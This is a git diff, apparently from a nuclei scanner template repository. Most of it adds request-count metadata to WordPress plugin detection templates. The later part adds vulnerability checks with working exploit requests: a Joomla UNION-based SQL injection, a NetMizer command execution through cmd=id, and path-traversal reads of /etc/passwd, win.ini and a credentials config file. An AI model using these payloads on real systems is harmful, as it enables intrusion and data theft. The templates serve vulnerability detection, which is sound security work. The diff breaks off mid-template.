a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 9c46352c5b..03ba28ee36 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/vulnerabilities/bsphp-info.yaml b/http/vulnerabilities/bsphp-info.yaml new file mode 100644 index 0000000000..39876088cb --- /dev/null +++ b/http/vulnerabilities/bsphp-info.yaml @@ -0,0 +1,38 @@ +id: bsphp-info + +info: + name: BSPHP - Information Disclosure + author: ritikchaddha + severity: low + description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + - https://github.com/bigblackhat/oFx/blob/main/poc/BSPHP/Info_Disclosure/poc.py + metadata: + max-request: 1 + verified: true + fofa-query: title="BSPHP" + tags: bsphp,info,disclosure + +http: + - method: GET + path: + - '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0' + + matchers-condition: and + matchers: + - type: word + words: + - '{"data":' + - '"id"' + - '"user"' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml new file mode 100644 index 0000000000..31691c9d7e --- /dev/null +++ b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml @@ -0,0 +1,39 @@ +id: discuz-api-pathinfo + +info: + name: Discuz! X2.5 - Path Disclosure + author: ritikchaddha + severity: low + description: Discuz! X2.5 api.php path disclosure vulnerability + reference: + - https://crx.xmspace.net/discuz_x25_api_php.html + - http://www.1314study.com/t/87417.html + metadata: + max-request: 1 + verified: true + shodan-query: title:"Discuz!" + fofa-query: title="Discuz!" + tags: discuz,info,disclosure + +http: + - method: GET + path: + - '{{BaseURL}}/api.php?mod[]=auto' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '.php on line' + - 'function.array' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/joomla/joomla-department-sqli.yaml b/http/vulnerabilities/joomla/joomla-department-sqli.yaml new file mode 100644 index 0000000000..5bd2be758e --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-department-sqli.yaml @@ -0,0 +1,29 @@ +id: joomla-department-sqli + +info: + name: Joomla `departments` - SQL Injection + author: ritikchaddha + severity: high + description: | + Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://github.com/opensec-cn/kunpeng/blob/master/plugin/json/joomla_departments_sqli.json + - https://github.com/w3bd0gs/cocoworker/blob/master/plugins/beebeeto/poc_2014_0170.py + metadata: + max-request: 1 + shodan-query: http.component:"Joomla" + tags: joomla,sqli + +variables: + num: "999999999" + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--" + + matchers: + - type: word + part: body + words: + - '{{md5(num)}}' diff --git a/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml b/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml new file mode 100644 index 0000000000..07b676e6a4 --- /dev/null +++ b/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml @@ -0,0 +1,37 @@ +id: netmizer-cmd-rce + +info: + name: NetMizer LogManagement System cmd.php - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + Remote Command Execution vulnerability in the NetMizer log management system cmd.php, and the attacker can execute the command by passing in the cmd parameter. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/NetMizer%20%E6%97%A5%E5%BF%97%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20cmd.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: title="NetMizer 日志管理系统" + shodan-query: title:"NetMizer" + verified: true + tags: netmizer,cmd,rce + +http: + - method: GET + path: + - "{{BaseURL}}/data/manage/cmd.php?cmd=id" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/netmizer/netmizer-data-listing.yaml b/http/vulnerabilities/netmizer/netmizer-data-listing.yaml new file mode 100644 index 0000000000..640054d5e2 --- /dev/null +++ b/http/vulnerabilities/netmizer/netmizer-data-listing.yaml @@ -0,0 +1,39 @@ +id: netmizer-data-listing + +info: + name: NetMizer LogManagement System Data - Directory Exposure + author: DhiyaneshDk + severity: high + description: | + Directory Exposure vulnerability in the NetMizer log management system of Beijing Lingzhou Network Technology Co., Ltd. Due to the loose control of /data, attackers can use this vulnerability to obtain sensitive information. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/NetMizer%20%E6%97%A5%E5%BF%97%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20data%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: title="NetMizer 日志管理系统" + shodan-query: title:"NetMizer" + verified: true + tags: netmizer,exposure,listing + +http: + - method: GET + path: + - "{{BaseURL}}/data/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Index of /data' + - 'bin/' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml new file mode 100644 index 0000000000..90516b2ac4 --- /dev/null +++ b/http/vulnerabilities/other/acti-video-lfi.yaml @@ -0,0 +1,37 @@ +id: acti-video-lfi + +info: + name: ACTi-Video Monitoring - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + ACTI video surveillance has loopholes in reading any files + reference: + - https://www.cnblogs.com/hmesed/p/16292252.html + metadata: + max-request: 1 + verified: true + fofa-query: app="ACTi-视频监控" + shodan-query: title:"Web Configurator" + tags: acti,lfi,iot,video,monitoring + +http: + - method: GET + path: + - "{{BaseURL}}/images/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/avcon6-execl-lfi.yaml b/http/vulnerabilities/other/avcon6-execl-lfi.yaml new file mode 100644 index 0000000000..ecee030859 --- /dev/null +++ b/http/vulnerabilities/other/avcon6-execl-lfi.yaml @@ -0,0 +1,38 @@ +id: avcon6-execl-lfi + +info: + name: AVCON6 org_execl_download.action - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + Arbitrary File Download vulnerability in the org_execl_download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: app="AVCON-6" + tags: avcon6,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/org_execl_download.action?filename=../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + - "filename=" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/avcon6-lfi.yaml b/http/vulnerabilities/other/avcon6-lfi.yaml new file mode 100644 index 0000000000..1ae56b3b3c --- /dev/null +++ b/http/vulnerabilities/other/avcon6-lfi.yaml @@ -0,0 +1,38 @@ +id: avcon6-lfi + +info: + name: AVCON6 - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + File Download vulnerability in the download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: app="AVCON-6" + tags: avcon6,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/download.action?filename=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + - "filename=" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/clodop-printer-lfi.yaml b/http/vulnerabilities/other/clodop-printer-lfi.yaml new file mode 100644 index 0000000000..7933be851c --- /dev/null +++ b/http/vulnerabilities/other/clodop-printer-lfi.yaml @@ -0,0 +1,40 @@ +id: clodop-printer-lfi + +info: + name: C-Lodop Printer - Arbitrary File Read + author: DhiyaneshDk + severity: high + description: | + The C-Lodop printer has an arbitrary file reading vulnerability. By constructing a special URL, it can read any file in the system. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/8e4f0be1f75a71cffe4b2c2c558ad1cd4d03d9a7/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/C-Lodop%E6%89%93%E5%8D%B0%E6%9C%BA%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + shodan-query: title:"Welcome to C-Lodop" + fofa-query: title="C-Lodop" + verified: true + tags: c-lodop,lfi,printer,iot + +http: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/easyimage-downphp-lfi.yaml b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml new file mode 100644 index 0000000000..f095dfae89 --- /dev/null +++ b/http/vulnerabilities/other/easyimage-downphp-lfi.yaml @@ -0,0 +1,37 @@ +id: easyimage-downphp-lfi + +info: + name: EasyImage down.php - Arbitrary File Read + author: DhiyaneshDk + severity: high + reference: + - https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go + metadata: + max-request: 1 + verified: true + fofa-query: app="EasyImage-简单图床" + tags: easyimage,lfi,exposure,config + +http: + - method: GET + path: + - "{{BaseURL}}/application/down.php?dw=config/config.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'user'=>" + - "'password'=>" + - "EasyImage" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/kodak-network-lfi.yaml b/http/vulnerabilities/other/kodak-network-lfi.yaml new file mode 100644 index 0000000000..c39b7ff202 --- /dev/null +++ b/http/vulnerabilities/other/kodak-network-lfi.yaml @@ -0,0 +1,38 @@ +id: kedacom-network-lfi + +info: + name: Kedacom Network Keyboard Console - Arbitrary File Read + author: DhiyaneshDk + severity: high + description: | + There is an arbitrary file reading vulnerability in the KEDACOM network keyboard console. Attacking this vulnerability can read arbitrary information from the server + reference: + - 